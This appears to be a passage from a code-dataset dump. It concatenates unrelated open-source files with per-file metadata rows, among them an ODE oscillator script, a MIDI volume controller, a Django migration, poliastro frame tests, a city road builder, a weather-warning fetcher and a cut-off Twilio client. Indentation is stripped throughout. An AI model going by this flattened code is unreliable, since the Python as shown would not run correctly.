The **grid graphs** embedded in the Euclidean plane are not rigid, as the
following animation demonstrates:
However, one can make them rigid by adding diagonal edges to the cells. For
example, for the 2x3 grid graph, there are 19 ways to make the graph rigid:
Note that for the purposes of this problem, we do not consider changing the
orientation of a diagonal edge or adding both diagonal edges to a cell as a
different way of making a grid graph rigid.
Let R(m,n) be the number of ways to make the m × n grid graph rigid.
E.g. R(2,3) = 19 and R(5,5) = 23679901
Define S(N) as ∑R(i,j) for 1 ≤ i, j ≤ N.
E.g. S(5) = 25021721.
Find S(100), give your answer modulo 1000000033
"""
| gpl-3.0 | 7,233,314,266,194,622,000 | 43.388889 | 77 | 0.761577 | false | 3.535398 | false | false | false |
sideshownick/Snaking_Networks | Illogic/run_solve.py | 1 | 1827 | from pylab import *
from scipy import sparse
from scipy.integrate import odeint
import os, time
from osc_eqn import osc2
from my_parameters import *
detune=0.001
alpha0=3.08
alpha1=1e-3*random(Nosc)+alpha0
alpha1=1.0/(alpha1)
length1=length*stepsize+1
tlength=translength*stepsize+1
S1=zeros((Nosc,Nosc))
S1[0,5]=S1[1,4]=S1[2,3]=0.8
S1[3,0]=S1[3,1]=S1[4,0]=S1[4,2]=S1[5,1]=S1[5,2]=0.4
#for i in range(0,Nosc-1):
# S1[i,i+1]=0.2
#S1[Nosc-1,0]=0.8
print S1
S=sparse.csr_matrix(S1)
#ic1=[]
#for line in file('fc0.txt'):
# ic1.append(double(line))
for coupling in [0.11]:#arange(0.11,0.115,0.001): #[0.09]:
try: os.mkdir('Data')
except: pass
#arange(3.535,3.55,0.001):
for beta in [3.5]:
beta1=1e-3*random(Nosc)+beta
beta1=1.0/(beta1)
outname='a%2.3f_b%2.3f_c%2.3f'%(alpha0,beta,coupling)
print 'running params %s'%outname
#set initial conditions
#x=ic1
x=[]
for n in range(0, Nosc):
x.append(0.01*rand()+(-1)**(n+1)*3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*0.3)
for n in range(0, Nosc):
x.append((-1)**(n+1)*1.0)
x=array(x)
time0=time.time()
##transient
timepoints = arange(1., tlength, stepsize)
transient = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
tran3=reshape(transient,(translength,Nosc*3))
savetxt('data_transient.txt',tran3)
x=transient[-1,:]
time1=time.time()
timepoints = arange(1., length1, stepsize)
trajectory = odeint(osc2, x, timepoints, args=(alpha1, beta1, coupling, S))
time2=time.time()
x=trajectory[-1,:]
print "Solved in %e seconds (%e transient + %e printed)" % (time2-time0,time1-time0,time2-time1)
plot(trajectory[:,0])
savefig('traj.png')
savetxt('fc.txt',trajectory[-1,:])
traj3=reshape(trajectory,(length,Nosc*3))
savetxt('data_trajectory.txt',traj3)
#end
| gpl-2.0 | 2,475,075,068,369,918,500 | 21.280488 | 100 | 0.648057 | false | 2.211864 | false | false | false |
psylo8/midivol | midivol_win.py | 1 | 7621 | import sys
import time
from subprocess import call
import pygame.midi
class NircmdMixer():
"""
Set system volume, val =[0, 65535]
"""
def __init__(self):
self.current_volume = 0
def volume_to_int(self, volume):
"""
Convert 0-100 volume value to [0, 65535] range
"""
result = 0
try:
result = int(65535 * volume / 100)
except Exception:
pass
return result
def setvolume(self, vol, verbose=False):
if vol != self.current_volume:
volume = self.volume_to_int(vol)
call(["nircmd", "setsysvolume", str(volume)])
self.current_volume = vol
if verbose:
print 'Midivol: Volume set to {}'.format(self.current_volume)
# print str(volume)
class Midivol():
'''
Class used to control master volume mixer (using nircmd) from midi input (pygame.midi) on windows systems
'''
system_mixer = NircmdMixer()
tag ='Midivol: '
def __init__(self, device='', max_volume=50, channel=None, control=None, verbose=False):
self.device = device
self.max_volume = max_volume
self.channel = channel
self.control = control
self.verbose = verbose
self.inputs = pygame.midi
self.inputs.init()
self.devices = self.get_device_list()
self.stop_listening = False
def build(self):
'''
Finalize midivol and run main listening loop
'''
if not self.device:
if self.inputs.get_count() == 0:
raise Exception('No available MIDI devices')
else:
for d in self.devices:
if d[2] == 1: #input
self.device = self.devices.index(d)
break
else:
try:
self.device = int(self.device)
except ValueError:
raise Exception("Incorrect device parameter")
if self.device < len(self.devices):
# list of gates functions attribute to determine
# if msg should be passed (processed volume change)
self.funky_list = []
if self.channel != None:
self.funky_list.append(self.channel_gates)
if self.control != None:
self.funky_list.append(self.control_gates)
self.listening_input = self.inputs.Input(self.device, 0)
self.log_msg('Running using MIDI device: {}, max_vol: {}, filters: channel {} control {}'.format(
self.devices[self.device][1], self.max_volume, self.channel, self.control))
else:
raise Exception('"{}" input device not found'.format(self.device))
def run(self):
# main loop for MIDI msg listening
while True:
if self.listening_input.poll():
msg = self.listening_input.read(1)
self.set_volume_from_midi_msg(msg)
if self.verbose:
self.log_msg(msg)
time.sleep(0.005)
def assign_device_by_name(self,name):
for dev in xrange(0, self.inputs.get_count()):
dev_info = self.inputs.get_device_info(dev)
if name == dev_info[1] and dev_info[2] == 1:
self.device = dev
return True
# devices.append(self.inputs.get_device_info(dev))
return False
def get_device_list(self):
devices = []
for dev in xrange(0, self.inputs.get_count()):
devices.append(self.inputs.get_device_info(dev))
return devices
def set_volume(self, val): #dev
'''
Sets volume of self.system_mixer
'''
if val > self.max_volume:
val = self.max_volume
self.system_mixer.setvolume(val)
def channel_gates(self, msg):
'''
Msg passes gates if channel is as needed
'''
return self.channel == msg[0][0][0]
def control_gates(self, msg):
'''
Msg passes gates if control id is as needed
'''
return self.control == msg[0][0][1]
def set_volume_from_midi_msg(self, msg):
'''
Set volume for main mixer from mido midi msg object
'''
for funk in self.funky_list:
if not funk(msg):
return
val = self.midi_to_volume(msg[0][0][2])
self.set_volume(val)
def log_msg(self, msg):
'''
Log msg with tag to console
'''
print '{} {}'.format(self.tag, str(msg))
def midi_to_volume(self, value):
'''
Convert midi 0-127 values to 0-99 volume values
'''
volume = 0
try:
volume = int(value // 1.28)
except Exception:
print Exception
return volume
def assign_param(argv, param_name, param_value, convert_to_int=False):
'''
Return param value [idx + 1] if found in list, if not found returns unchanged
Converts result to int if parameter supplied
'''
idx = None
try:
idx = argv.index(param_name)
except ValueError:
return param_value
try:
param_value = argv[idx + 1]
if convert_to_int:
try:
param_value = int(param_value)
except ValueError:
pass
except IndexError:
pass
return param_value
def display_help():
'''
Displays help info in the console for -h parameter
'''
help_content = []
help_content.append('----------------------------------------------\n')
help_content.append('Control system volume tool using MIDI messages\n')
help_content.append(' Available parameters:\n')
help_content.append(' -h Display help info\n')
help_content.append(' -d MIDI device name or id (default first available MIDI device)\n')
help_content.append(' Can be integer value, which means # of available midi devices\n')
help_content.append(' -l Returns list of all available MIDI devices\n')
help_content.append(' -ch MIDI channel listen to 0-15 (default all)\n')
help_content.append(' -ct MIDI control id to process, type int (default all ids)\n')
help_content.append(' -m Max volume threshold 0-99 (default 30)\n')
help_content.append(' -v Run in verbose mode\n')
print ''.join(help_content)
quit()
def display_devices():
'''
Displays all available MIDI devices seen by mido
'''
midi = pygame.midi
midi.init()
print 'List of available MIDI devices:'
print '(interf, name, input, output, opened)'
for dev in xrange(0, midi.get_count()):
print midi.get_device_info(dev)
quit()
def assign_params(midivol):
'''
Assign sys.argv params to midivol atrrbutes
'''
help_par = '-h'
device_par = '-d'
list_par = '-l'
channel_par = '-ch'
control_par = '-ct'
maxvolume_par = '-m'
verbose_par = '-v'
if help_par in sys.argv:
display_help()
if list_par in sys.argv:
display_devices()
midivol.device = assign_param(sys.argv, device_par, midivol.device)
midivol.channel = assign_param(sys.argv, channel_par, midivol.channel, True)
midivol.control = assign_param(sys.argv, control_par, midivol.control, True)
midivol.max_volume = assign_param(sys.argv, maxvolume_par, midivol.max_volume, True)
if verbose_par in sys.argv:
midivol.verbose = True
def main():
'''
Main method
'''
midivol = Midivol()
assign_params(midivol)
midivol.build()
midivol.run()
if __name__ == "__main__":
main()
| gpl-3.0 | 174,499,710,867,700,300 | 30.237705 | 109 | 0.566855 | false | 3.723009 | false | false | false |
arunchaganty/contextual-comparatives | bin/summarize_evaluation.py | 1 | 1664 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
import csv
import sys
from collections import Counter
def do_command(args):
reader = csv.reader(args.input, delimiter="\t")
writer = csv.writer(args.output, delimiter="\t")
header = next(reader)
assert header == "id baseline_perspective generation_perspective baseline_votes generation_votes none_votes n_votes error_analysis".split(), "invalid header: " + header
counter = Counter()
for id, baseline_perspective, generation_perspective, baseline_votes, generation_votes, none_votes, n_votes, error_analysis in reader:
#if generation_perspective == "": continue
baseline_wins = int(baseline_votes) >= int(n_votes)/2
generation_wins = int(generation_votes) >= int(n_votes)/2
counter[baseline_wins, generation_wins] += 1
writer.writerow(["baseline perspective is rated useful", "generation perspective is rated useful", "# Mentions"])
for truth in [True, False]:
for truth_ in [True, False]:
writer.writerow([truth, truth_, counter[truth, truth_]])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser( description='' )
parser.add_argument('--input', type=argparse.FileType('r'), default=sys.stdin, help="")
parser.add_argument('--output', type=argparse.FileType('w'), default=sys.stdout, help="")
parser.set_defaults(func=do_command)
#subparsers = parser.add_subparsers()
#command_parser = subparsers.add_parser('command', help='' )
#command_parser.set_defaults(func=do_command)
ARGS = parser.parse_args()
ARGS.func(ARGS)
| mit | -4,559,597,711,908,071,400 | 37.697674 | 172 | 0.676082 | false | 3.681416 | false | false | false |
pkimber/compose | compose/migrations/0018_auto_20170418_1445.py | 1 | 5784 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-18 13:45
from __future__ import unicode_literals
import block.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('block', '0018_image_user'),
('compose', '0017_auto_20160205_1752'),
]
operations = [
migrations.CreateModel(
name='Calendar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Calendar',
'verbose_name': 'Calendar',
},
),
migrations.CreateModel(
name='CalendarBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.CreateModel(
name='Map',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Map',
'verbose_name': 'Map',
},
),
migrations.CreateModel(
name='MapBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.AddField(
model_name='map',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.MapBlock'),
),
migrations.AddField(
model_name='map',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='map',
name='map',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='map', to='block.Link'),
),
migrations.AddField(
model_name='map',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='map',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calendar',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.CalendarBlock'),
),
migrations.AddField(
model_name='calendar',
name='calendar',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='calendar', to='block.Link'),
),
migrations.AddField(
model_name='calendar',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='calendar',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='calendar',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='map',
unique_together=set([('block', 'moderate_state')]),
),
migrations.AlterUniqueTogether(
name='calendar',
unique_together=set([('block', 'moderate_state')]),
),
]
| apache-2.0 | -700,877,570,277,012,400 | 42.164179 | 153 | 0.56639 | false | 4.326103 | false | false | false |
Juanlu001/poliastro | tests/test_frames.py | 1 | 7645 | import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import (
CartesianRepresentation,
get_body_barycentric,
solar_system_ephemeris,
)
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from poliastro.bodies import (
Earth,
Jupiter,
Mars,
Mercury,
Neptune,
Saturn,
Sun,
Uranus,
Venus,
)
from poliastro.constants import J2000
from poliastro.frames.ecliptic import GeocentricSolarEcliptic
from poliastro.frames.equatorial import (
GCRS,
HCRS,
ICRS,
JupiterICRS,
MarsICRS,
MercuryICRS,
NeptuneICRS,
SaturnICRS,
UranusICRS,
VenusICRS,
)
from poliastro.frames.fixed import (
ITRS,
JupiterFixed,
MarsFixed,
MercuryFixed,
NeptuneFixed,
SaturnFixed,
SunFixed,
UranusFixed,
VenusFixed,
)
@pytest.mark.parametrize(
"body, frame",
[
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_frames_have_proper_string_representations(body, frame):
coords = frame()
assert body.name in repr(coords)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_icrs_frame_is_just_translation(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = CartesianRepresentation(x=100 * u.km, y=100 * u.km, z=100 * u.km)
vector_result = (
frame(vector, obstime=epoch)
.transform_to(ICRS)
.represent_as(CartesianRepresentation)
)
expected_result = get_body_barycentric(body.name, epoch) + vector
assert_quantity_allclose(vector_result.xyz, expected_result.xyz)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_icrs_body_position_to_planetary_frame_yields_zeros(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = get_body_barycentric(body.name, epoch)
vector_result = (
ICRS(vector)
.transform_to(frame(obstime=epoch))
.represent_as(CartesianRepresentation)
)
assert_quantity_allclose(vector_result.xyz, [0, 0, 0] * u.km, atol=1e-7 * u.km)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_fixed_inertial_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
fixed_position = fixed_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
inertial_position = fixed_position.transform_to(inertial_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_fixed_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
inertial_position = inertial_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
fixed_position = inertial_position.transform_to(fixed_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_roundtrip_vector(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
sampling_time = 10 * u.s
fixed_position = fixed_frame(
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(body.R, (1000,), subok=True),
representation_type="spherical",
obstime=epoch + np.arange(1000) * sampling_time,
)
inertial_position = fixed_position.transform_to(
inertial_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
fixed_position_roundtrip = inertial_position.transform_to(
fixed_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
assert_quantity_allclose(
fixed_position.cartesian.xyz,
fixed_position_roundtrip.cartesian.xyz,
atol=1e-7 * u.km,
)
def test_round_trip_from_GeocentricSolarEcliptic_gives_same_results():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time("J2000")))
gcrs_back = gse.transform_to(GCRS(obstime=Time("J2000")))
assert_quantity_allclose(gcrs_back.dec.value, gcrs.dec.value, atol=1e-7)
assert_quantity_allclose(gcrs_back.ra.value, gcrs.ra.value, atol=1e-7)
def test_GeocentricSolarEcliptic_against_data():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=J2000))
lon = 233.11691362602866
lat = 48.64606410986667
assert_quantity_allclose(gse.lat.value, lat, atol=1e-7)
assert_quantity_allclose(gse.lon.value, lon, atol=1e-7)
def test_GeocentricSolarEcliptic_raises_error_nonscalar_obstime():
with pytest.raises(ValueError) as excinfo:
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time(["J3200", "J2000"])))
assert (
"To perform this transformation the "
"obstime Attribute must be a scalar." in str(excinfo.value)
)
| mit | -3,125,264,317,094,795,300 | 30.204082 | 88 | 0.628646 | false | 2.960883 | true | false | false |
aucor/servo | servo/models/device.py | 1 | 2057 | #coding=utf-8
from django.db import models
from django.dispatch import receiver
from django.utils.translation import ugettext as _
from django.db.models.signals import pre_save, post_save
import gsx
from servo.models.common import Tag, Attachment
class Device(models.Model):
sn = models.CharField(max_length=32, blank=True,
verbose_name=_(u'sarjanumero'))
description = models.CharField(max_length=128, default=_('Uusi laite'),
verbose_name=_(u'kuvaus'))
username = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'käyttäjätunnus'))
password = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'salasana'))
purchased_on = models.DateField(blank=True, null=True,
verbose_name=_(u'hankittu'))
notes = models.TextField(blank=True, null=True,
verbose_name=_(u'merkinnät'))
tags = models.ManyToManyField(Tag, null=True, blank=True,
verbose_name=_(u'tagit'))
files = models.ManyToManyField(Attachment)
@classmethod
def from_gsx(cls, sn):
"""
Search GSX and initialize a new Device with the results
"""
dev = gsx.Product(sn).get_warranty()
device = Device(sn=dev.serialNumber,
description=dev.productDescription,
purchased_on=dev.estimatedPurchaseDate)
device.save()
return device
def get_absolute_url(self):
return "/devices/%d/view/" % self.pk
def spec_id(self):
return self.tags.all()[0].id
def __unicode__(self):
return '%s (%s)' %(self.description, self.sn)
class Meta:
app_label = 'servo'
@receiver(post_save, sender=Device)
def create_spec(sender, instance, created, **kwargs):
# make sure we have this spec
if created:
(tag, created) = Tag.objects.get_or_create(title=instance.description,
type='device')
instance.tags.add(tag)
instance.save()
| bsd-2-clause | 1,277,555,999,983,982,600 | 33.216667 | 79 | 0.622017 | false | 3.739526 | false | false | false |
ekumenlabs/terminus | terminus/builders/simple_city_builder.py | 1 | 7417 | """
Copyright (C) 2017 Open Source Robotics Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from geometry.point import Point
from models.city import City
from models.street import Street
from models.trunk import Trunk
from models.block import Block
from models.building import Building
from models.ground_plane import GroundPlane
from models.road import *
from builders.abstract_city_builder import AbstractCityBuilder
class SimpleCityBuilder(AbstractCityBuilder):
def _buid_city(self):
# Must be odd
size = 5
city = City("Simple City")
self.multiplier = 100
self._create_ground_plane(city, size)
self._setup_intersections(city, size)
self._create_inner_streets(city, size)
self._create_surrounding_ring_road(city, size)
# Disabling this temporarily as we are focusing on road networks
# self._create_blocks(city, size)
# self._create_buildings(city, size)
return city
def _setup_intersections(self, city, size):
self.intersections = [[Point(self.multiplier * x, self.multiplier * y, 0)
for y in range(size)] for x in range(size)]
for x in range(size - 1):
self.intersections[x][0] = self.intersections[x][0] + Point(0, -2)
self.intersections[size - 1][0] = self.intersections[size - 1][0] + Point(2, -2)
for y in range(1, size):
self.intersections[size - 1][y] = self.intersections[size - 1][y] + Point(2, 0)
for x in range(size - 1):
self.intersections[size - x - 1][size - 1] = self.intersections[size - x - 1][size - 1] + Point(0, 2)
self.intersections[0][size - 1] = self.intersections[0][size - 1] + Point(-2, 2)
for y in range(1, size):
self.intersections[0][size - y - 1] = self.intersections[0][size - y - 1] + Point(-2, 0)
for x in range(size):
for y in range(size):
city.add_intersection_at(self.intersections[x][y])
def _create_ground_plane(self, city, size):
ground_plane_size = size * self.multiplier
ground_plane = GroundPlane(ground_plane_size,
Point(ground_plane_size / 2,
ground_plane_size / 2,
0),
'ground_plane')
city.set_ground_plane(ground_plane)
def _create_inner_streets(self, city, size):
# Vertical
for x in range(1, size - 1):
road = Street()
for y in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Horizontal
for y in range(1, size - 1):
road = Street()
for x in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Diagonals
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][i])
city.add_road(road)
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][size - i - 1])
city.add_road(road)
def _create_surrounding_ring_road(self, city, size):
ring_road_1 = Trunk(name='RingRoad1')
for x in range(size):
ring_road_1.add_control_point(self.intersections[x][0])
city.add_road(ring_road_1)
ring_road_2 = Trunk(name='RingRoad2')
for y in range(size):
ring_road_2.add_control_point(self.intersections[size - 1][y])
city.add_road(ring_road_2)
ring_road_3 = Trunk(name='RingRoad3')
for x in range(size):
ring_road_3.add_control_point(self.intersections[size - x - 1][size - 1])
city.add_road(ring_road_3)
ring_road_4 = Trunk(name='RingRoad4')
for y in range(size):
ring_road_4.add_control_point(self.intersections[0][size - y - 1])
city.add_road(ring_road_4)
def _create_blocks(self, city, size):
blocks_count = size - 1
block_size = 96
inital_offset = 50
street_width = 4
half_street_width = street_width / 2.0
triangle_delta = 93
for x in range(blocks_count):
for y in range(blocks_count):
if x == y:
origin = Point(street_width + 1 + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point(half_street_width + x * self.multiplier,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
elif x + y == blocks_count - 1:
origin = Point(half_street_width + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(0, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point((x + 1) * self.multiplier - half_street_width,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(-triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
else:
origin = Point(inital_offset + x * self.multiplier,
inital_offset + y * self.multiplier, 0)
block = Block.square(origin, block_size)
city.add_block(block)
def _create_buildings(self, city, size):
blocks_count = size - 1
building_spacing = 18
for x in range(blocks_count):
for y in range(blocks_count):
for block_x in range(3):
for block_y in range(3):
pos = Point(x * self.multiplier + block_x * 30 + building_spacing,
y * self.multiplier + block_y * 30 + building_spacing, 0)
if abs(pos.y - pos.x) > building_spacing and \
abs(pos.y + pos.x - self.multiplier * blocks_count) > building_spacing:
building = Building.square(pos, 20, 40)
city.add_building(building)
| apache-2.0 | 3,878,573,317,858,789,000 | 40.668539 | 119 | 0.55184 | false | 3.859001 | false | false | false |
nhho/hko | hko/weather_warning.py | 2 | 1053 | """A module to retrieve weather warning data from Hong Kong Observatory"""
import json
import requests
BASE_URL = 'http://www.weather.gov.hk/'
URL_UC = 'wxinfo/json/warnsumc.xml'
URL_EN = 'wxinfo/json/warnsum.xml'
def weather_warning(lang='UC'):
"""A function to retrieve weather warning data from Hong Kong Observatory"""
response = {}
if lang in ['UC', 'EN']:
try:
if lang == 'UC':
data = requests.get(BASE_URL + URL_UC)
if lang == 'EN':
data = requests.get(BASE_URL + URL_EN)
data_2 = json.loads(data.text.replace('var weather_warning_summary = ', '')[:-2] + '}')
response['result'] = data_2
response['status'] = 1
except IndexError:
response['result'] = ''
response['status'] = 2
except requests.exceptions.RequestException:
response['result'] = ''
response['status'] = 5
else:
response['result'] = ''
response['status'] = 0
return response
| mit | -331,712,446,974,401,000 | 28.25 | 99 | 0.554606 | false | 3.871324 | false | false | false |
twilio/twilio-python | twilio/rest/autopilot/v1/assistant/webhook.py | 2 | 17306 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class WebhookList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, assistant_sid):
"""
Initialize the WebhookList
:param Version version: Version that contains the resource
:param assistant_sid: The SID of the Assistant that is the parent of the resource
:returns: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
:rtype: twilio.rest.autopilot.v1.assistant.webhook.WebhookList
"""
super(WebhookList, self).__init__(version)
# Path Solution
self._solution = {'assistant_sid': assistant_sid, }
self._uri = '/Assistants/{assistant_sid}/Webhooks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams WebhookInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.autopilot.v1.assistant.webhook.WebhookInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists WebhookInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
